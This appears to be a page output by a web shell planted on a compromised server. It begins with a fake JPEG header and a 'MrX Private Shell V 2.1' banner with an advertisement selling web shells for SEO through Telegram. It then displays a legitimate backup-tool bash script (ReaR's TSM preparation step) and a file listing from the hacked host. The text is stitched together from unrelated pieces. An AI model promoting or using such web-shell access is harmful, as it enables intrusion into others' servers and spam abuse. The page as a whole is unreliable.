����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# prepare stuff for TSM
#
# some sites have strange habits ... (dms.* files not where they should be)
COPY_AS_IS+=( "${COPY_AS_IS_TSM[@]}"
$( readlink /opt/tivoli/tsm/client/ba/bin/dsm.sys )
$( readlink /opt/tivoli/tsm/client/ba/bin/dsm.opt )
)
COPY_AS_IS_EXCLUDE+=( "${COPY_AS_IS_EXCLUDE_TSM[@]}" )
PROGS+=( "${PROGS_TSM[@]}" )
# Find gsk lib diriectory and add it to the TSM_LD_LIBRARY_PATH
# see issue https://github.com/rear/rear/issues/1688
for gsk_dir in $(ls -d /usr/local/ibm/gsk*/lib* ) ; do
TSM_LD_LIBRARY_PATH=$TSM_LD_LIBRARY_PATH:$gsk_dir
done
# Use a TSM-specific LD_LIBRARY_PATH to find TSM libraries
# see https://github.com/rear/rear/issues/1533
LD_LIBRARY_PATH_FOR_BACKUP_TOOL="$TSM_LD_LIBRARY_PATH"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 400_prep_tsm.sh | File | 764 B | 0644 |
|